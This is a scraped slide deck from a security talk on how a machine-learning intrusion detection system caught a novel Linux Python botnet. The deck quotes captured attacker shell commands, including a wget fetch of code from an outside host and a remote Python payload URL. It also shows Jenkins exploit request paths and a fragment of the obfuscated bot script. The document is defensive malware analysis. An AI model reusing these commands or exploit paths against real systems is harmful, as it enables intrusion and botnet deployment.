Arti Languages Pre Seed Pitchdeck 2024.pdfArti Languages Pre Seed Pitchdeck 2024.pdf
Arti Languages Pre Seed Pitchdeck 2024.pdfwill854175
 
JET Technology Labs White Paper for Virtualized Security and Encryption Techn...
JET Technology Labs White Paper for Virtualized Security and Encryption Techn...JET Technology Labs White Paper for Virtualized Security and Encryption Techn...
JET Technology Labs White Paper for Virtualized Security and Encryption Techn...amber724300
 
Potential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and InsightsPotential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and InsightsRavi Sanghani
 
Top 10 Hubspot Development Companies in 2024
Top 10 Hubspot Development Companies in 2024Top 10 Hubspot Development Companies in 2024
Top 10 Hubspot Development Companies in 2024TopCSSGallery
 
Automation Ops Series: Session 3 - Solutions management
Automation Ops Series: Session 3 - Solutions managementAutomation Ops Series: Session 3 - Solutions management
Automation Ops Series: Session 3 - Solutions managementDianaGray10
 
Introduction-to-Wazuh-and-its-integration.pptx
Introduction-to-Wazuh-and-its-integration.pptxIntroduction-to-Wazuh-and-its-integration.pptx
Introduction-to-Wazuh-and-its-integration.pptxmprakaash5
 
A Glance At The Java Performance Toolbox
A Glance At The Java Performance ToolboxA Glance At The Java Performance Toolbox
A Glance At The Java Performance ToolboxAna-Maria Mihalceanu
 
THE STATE OF STARTUP ECOSYSTEM - INDIA x JAPAN 2023
THE STATE OF STARTUP ECOSYSTEM - INDIA x JAPAN 2023THE STATE OF STARTUP ECOSYSTEM - INDIA x JAPAN 2023
THE STATE OF STARTUP ECOSYSTEM - INDIA x JAPAN 2023Joshua Flannery
 
QCon London: Mastering long-running processes in modern architectures
QCon London: Mastering long-running processes in modern architecturesQCon London: Mastering long-running processes in modern architectures
QCon London: Mastering long-running processes in modern architecturesBernd Ruecker
 
Which standard is best for your content?
Which standard is best for your content?Which standard is best for your content?
Which standard is best for your content?Rustici Software
 
Generative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdfGenerative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdfIngrid Airi González
 
QMMS Lesson 2 - Using MS Excel Formula.pdf
QMMS Lesson 2 - Using MS Excel Formula.pdfQMMS Lesson 2 - Using MS Excel Formula.pdf
QMMS Lesson 2 - Using MS Excel Formula.pdfROWELL MARQUINA
 
The Critical Role of Spatial Data in Today's Data Ecosystem
The Critical Role of Spatial Data in Today's Data EcosystemThe Critical Role of Spatial Data in Today's Data Ecosystem
The Critical Role of Spatial Data in Today's Data EcosystemSafe Software
 
Email Marketing Automation for Bonterra Impact Management (fka Social Solutio...
Email Marketing Automation for Bonterra Impact Management (fka Social Solutio...Email Marketing Automation for Bonterra Impact Management (fka Social Solutio...
Email Marketing Automation for Bonterra Impact Management (fka Social Solutio...Jeffrey Haguewood
 

Kürzlich hochgeladen (20)

The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
 
Women in Automation 2024: Career session - explore career paths in automation
Women in Automation 2024: Career session - explore career paths in automationWomen in Automation 2024: Career session - explore career paths in automation
Women in Automation 2024: Career session - explore career paths in automation
 
BoSEU24 | Bill Thompson | Talk From Another Century
BoSEU24 | Bill Thompson | Talk From Another CenturyBoSEU24 | Bill Thompson | Talk From Another Century
BoSEU24 | Bill Thompson | Talk From Another Century
 
Design pattern talk by Kaya Weers - 2024 (v2)
Design pattern talk by Kaya Weers - 2024 (v2)Design pattern talk by Kaya Weers - 2024 (v2)
Design pattern talk by Kaya Weers - 2024 (v2)
 
HCI Lesson 1 - Introduction to Human-Computer Interaction.pdf
HCI Lesson 1 - Introduction to Human-Computer Interaction.pdfHCI Lesson 1 - Introduction to Human-Computer Interaction.pdf
HCI Lesson 1 - Introduction to Human-Computer Interaction.pdf
 
React JS; all concepts. Contains React Features, JSX, functional & Class comp...
React JS; all concepts. Contains React Features, JSX, functional & Class comp...React JS; all concepts. Contains React Features, JSX, functional & Class comp...
React JS; all concepts. Contains React Features, JSX, functional & Class comp...
 
Arti Languages Pre Seed Pitchdeck 2024.pdf
Arti Languages Pre Seed Pitchdeck 2024.pdfArti Languages Pre Seed Pitchdeck 2024.pdf
Arti Languages Pre Seed Pitchdeck 2024.pdf
 
JET Technology Labs White Paper for Virtualized Security and Encryption Techn...
JET Technology Labs White Paper for Virtualized Security and Encryption Techn...JET Technology Labs White Paper for Virtualized Security and Encryption Techn...
JET Technology Labs White Paper for Virtualized Security and Encryption Techn...
 
Potential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and InsightsPotential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and Insights
 
Top 10 Hubspot Development Companies in 2024
Top 10 Hubspot Development Companies in 2024Top 10 Hubspot Development Companies in 2024
Top 10 Hubspot Development Companies in 2024
 
Automation Ops Series: Session 3 - Solutions management
Automation Ops Series: Session 3 - Solutions managementAutomation Ops Series: Session 3 - Solutions management
Automation Ops Series: Session 3 - Solutions management
 
Introduction-to-Wazuh-and-its-integration.pptx
Introduction-to-Wazuh-and-its-integration.pptxIntroduction-to-Wazuh-and-its-integration.pptx
Introduction-to-Wazuh-and-its-integration.pptx
 
A Glance At The Java Performance Toolbox
A Glance At The Java Performance ToolboxA Glance At The Java Performance Toolbox
A Glance At The Java Performance Toolbox
 
THE STATE OF STARTUP ECOSYSTEM - INDIA x JAPAN 2023
THE STATE OF STARTUP ECOSYSTEM - INDIA x JAPAN 2023THE STATE OF STARTUP ECOSYSTEM - INDIA x JAPAN 2023
THE STATE OF STARTUP ECOSYSTEM - INDIA x JAPAN 2023
 
QCon London: Mastering long-running processes in modern architectures
QCon London: Mastering long-running processes in modern architecturesQCon London: Mastering long-running processes in modern architectures
QCon London: Mastering long-running processes in modern architectures
 
Which standard is best for your content?
Which standard is best for your content?Which standard is best for your content?
Which standard is best for your content?
 
Generative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdfGenerative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdf
 
QMMS Lesson 2 - Using MS Excel Formula.pdf
QMMS Lesson 2 - Using MS Excel Formula.pdfQMMS Lesson 2 - Using MS Excel Formula.pdf
QMMS Lesson 2 - Using MS Excel Formula.pdf
 
The Critical Role of Spatial Data in Today's Data Ecosystem
The Critical Role of Spatial Data in Today's Data EcosystemThe Critical Role of Spatial Data in Today's Data Ecosystem
The Critical Role of Spatial Data in Today's Data Ecosystem
 
Email Marketing Automation for Bonterra Impact Management (fka Social Solutio...
Email Marketing Automation for Bonterra Impact Management (fka Social Solutio...Email Marketing Automation for Bonterra Impact Management (fka Social Solutio...
Email Marketing Automation for Bonterra Impact Management (fka Social Solutio...
 

Robots against robots: How Machine Learning IDS detected a novel Linux Botnet

  • 1. 1 Robots againstRobots against robots: How arobots: How a Machine LearningMachine Learning IDS detected aIDS detected a novel Linux Botnetnovel Linux Botnet Sebastian GarciaSebastian Garcia @eldracote@eldracote sebastian.garcia@agents.fel.cvut.czsebastian.garcia@agents.fel.cvut.cz https://stratosphereips.orghttps://stratosphereips.org bit.ly/SS-RvRbit.ly/SS-RvR
  • 2. 2 The DetectionThe Detection January 18th, 2016.January 18th, 2016. Testing Stratosphere IPS in the University network.Testing Stratosphere IPS in the University network. Have an alert from a malicious behavior in the IDS.Have an alert from a malicious behavior in the IDS. 147.32.xx.xx-23.247.5.27-25000-tcp [Global Frag Networks,US]:147.32.xx.xx-23.247.5.27-25000-tcp [Global Frag Networks,US]: 88,H,H,h,H,H,h,h,h,h,h,H,h,H,H,H,H,H,H,H,H,H,H,H,H,H,h,h,h,h,H,88,H,H,h,H,H,h,h,h,h,h,H,h,H,H,H,H,H,H,H,H,H,H,H,H,H,h,h,h,h,H, "For a long time there was a periodic connection (freq"For a long time there was a periodic connection (freq 5s-60s), to an uncommon port, with large flows of5s-60s), to an uncommon port, with large flows of medium duration."medium duration."
  • 3. 3 The Analysis: VisibilityThe Analysis: Visibility Argus flow suite from Qosient.Argus flow suite from Qosient. Storage of 3,000 hosts continually (1 year ~= 80GB)Storage of 3,000 hosts continually (1 year ~= 80GB) Back in time!Back in time!
  • 4. 4 The Detected ConnectionThe Detected Connection Sent: "+.............P.43.249.81.135.......?."Sent: "+.............P.43.249.81.135.......?." Recv: ".................................." (MBs)Recv: ".................................." (MBs) Recv once: "import time as O000OO0O0O00OO00O"Recv once: "import time as O000OO0O0O00OO00O" 43.249.81.13543.249.81.135 No VirusTotal detection.No VirusTotal detection. AS58879 Shanghai Anchang Network SecurityAS58879 Shanghai Anchang Network Security Technology Co.,L. China.Technology Co.,L. China. Last known domain: lyzqmir2.com. Minecraft server.Last known domain: lyzqmir2.com. Minecraft server.
  • 5. 5 The Begining: Jan 16th, 2016The Begining: Jan 16th, 2016 103.242.134.118103.242.134.118 portport 3333333333/TCP/TCP [VT:7][VT:7]​​ S:"/bin/sh: 0: can't access tty; job control turned off.$,"S:"/bin/sh: 0: can't access tty; job control turned off.$," S:"S:"tomcat6tomcat6 17547 0.0 0.0 7944 868 ? S 13:36 0:00 grep17547 0.0 0.0 7944 868 ? S 13:36 0:00 grep abcc.$abcc.$ S:"wget 23.247.5.27:435/abcc.c"S:"wget 23.247.5.27:435/abcc.c" R:"ps aux |grep abcc.ccd /tmp.m"R:"ps aux |grep abcc.ccd /tmp.m" 23.247.5.2723.247.5.27 portport 435435/TCP/TCP [VT:0][VT:0] 23.247.5.2723.247.5.27 portport 2500025000/TCP (main CC)/TCP (main CC) "=...-== Love AV ==-:..Linux 3.2.0-4-amd64""=...-== Love AV ==-:..Linux 3.2.0-4-amd64"
  • 6. 6 The AnalysisThe Analysis 103.242.134.118103.242.134.118 portport 2303123031/TCP/TCP ​​""version:0.1"version:0.1" "heartOK","hearta""heartOK","hearta" "deployOK:115.239.248.88:80:3:60 heartOK""deployOK:115.239.248.88:80:3:60 heartOK" 103.242.134.118103.242.134.118 portport 3333333333/TCP/TCP "http://222.179.116.23:8080/theme/1/pys.py""http://222.179.116.23:8080/theme/1/pys.py" Python script?Python script?
  • 7. 7 Our computer Attacking?Our computer Attacking? Hundreds of connections to IPs in China, port 80/UDP.Hundreds of connections to IPs in China, port 80/UDP. 115.239.248.88115.239.248.88 portport 8080//UDPUDP [MoveInternet Network[MoveInternet Network Technology Co.,Ltd.,CN]Technology Co.,Ltd.,CN] Few Kb ofFew Kb of binarybinary data sent.data sent. Could not find a motive or explanation.Could not find a motive or explanation.
  • 8. 8 The CompromiseThe Compromise What we knewWhat we knew Tomcat involved.Tomcat involved. Date range.Date range. We found strange POSTs to Jenkins minutes beforeWe found strange POSTs to Jenkins minutes before POST /jenkins/descriptor/hudson.model.DownloadService/byId/POST /jenkins/descriptor/hudson.model.DownloadService/byId/ hudson.tasks.Maven.MavenInstaller/postBackhudson.tasks.Maven.MavenInstaller/postBack POST /jenkins/ajaxExecutorsPOST /jenkins/ajaxExecutors Remote Jenkins code execution vulnerabilityRemote Jenkins code execution vulnerability . Metasploit module.. Metasploit module. CVE-CVE- 2015-81032015-8103
  • 9. 9 The Python Botnet ScriptThe Python Botnet Script import time as O000OO0O0O00OO00O import math as O000O0OO0O0O00O0O import socket as OO0000OOOOOO0O000 import os as OO00000000OO000OO import base64 as O0O0OOOO00O0O00OO import threading as O00O000000OOO0OO0 import random as O0OOO0O000OO0O00O class fbiabcd8c (O00O000000OOO0OO0 .Thread ): def __init__ (O0000O0OOOOOOO0O0 ): O00O000000OOO0OO0 .Thread .__init__ (O0000O0OOOOOOO0O0 ) def run (O0OO0OOOOO000O000 ): global SvneciA global fn023ca global fABRVUqfh if (fn023ca ==False ): return O00O0O00000OOO0OO =0 while fABRVUqfh : O00O0O00000OOO0OO +=1 if (SvneciA >=O00O0O00000OOO0OO ): O000OO0O0O00OO00O .sleep (1 ) else : break fABRVUqfh =False try : FcANECa .send (O0O0OOOO00O0O00OO .b64decode ("dWRwU3RvcHBlZA=="))
  • 10. 10 The Python Botnet ScriptThe Python Botnet Script Obfuscated. Deobfuscated by Veronica Valeros. Thx!Obfuscated. Deobfuscated by Veronica Valeros. Thx! Threads.Threads. C&C channel withC&C channel with 10s timeouts.10s timeouts. ​​Receives orders and executes commands, includingReceives orders and executes commands, including access to OS.access to OS. Confuse analysts? or DDoS?Confuse analysts? or DDoS? Function to send random UDP data to IPs receivedFunction to send random UDP data to IPs received by C&C.by C&C.
  • 11. 11 How Machine LearningHow Machine Learning detected this?detected this?
  • 13. 13 Stratosphere IPSStratosphere IPS Model network behaviors as a string ofModel network behaviors as a string of lettersletters.. 11 flowflow 33 featuresfeatures 11 letterletter
  • 15. 15 Markov Chains ModelsMarkov Chains Models Create, train and store a Markov Chain modelsCreate, train and store a Markov Chain models
  • 16. 16 Behavioral DetectionBehavioral Detection TrainedTrained Markov ModelsMarkov Models Similarity toSimilarity to Unknown TrafficUnknown Traffic
  • 17. 17 ConclusionConclusion Still unknown and hidden.Still unknown and hidden. CouldCould notnot be detected by usual protections.be detected by usual protections. No fingerprints, noNo fingerprints, no reputationsreputations, no rootkits., no rootkits. ContinuousContinuous VisibilityVisibility is paramount.is paramount. BehavioralBehavioral Machine Learning is improving.Machine Learning is improving.
  • 18. 18 Questions? And Thanks!Questions? And Thanks! Sebastian GarciaSebastian Garcia sebastian.garcia@agents.fel.cvut.czsebastian.garcia@agents.fel.cvut.cz @eldracote@eldracote Workshop Malware Traffic:Workshop Malware Traffic: bit.lybit.ly/SSdirtywork/SSdirtywork